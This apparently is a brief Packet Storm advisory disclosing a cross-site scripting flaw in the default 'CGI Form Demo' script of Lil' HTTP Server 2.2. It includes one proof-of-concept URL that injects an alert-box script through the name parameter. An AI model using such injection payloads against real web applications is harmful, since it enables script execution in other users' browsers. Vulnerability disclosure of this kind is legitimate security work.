Lil' HTTP Server version 2.2 suffers from a cross site scripting vulnerability in a default CGI script.
1cd00218bbd303ceb7a7c683ad4f9e471fe94b3e8bd6679f9bf4aab7ee9035d7Lil' HTTP Server v2.2 Default CGI From Xss Vulnerability
Discription :
In Lil' HTTP server 2.2v come with some Default applications
in "CGI Form Demo" Applicatio they alows you to submit your name and e-mail . there is a XSS vuln in submit application
Sample :
http://192.168.1.102/pbcgi.cgi?name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E
Reffernce :
- http://treasuresec.com [Treasure's Security Blog]
- http://www.summitcn.com/lilhttp/lildocs.html
- http://en.wikipedia.org/wiki/Cross-site_scripting
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed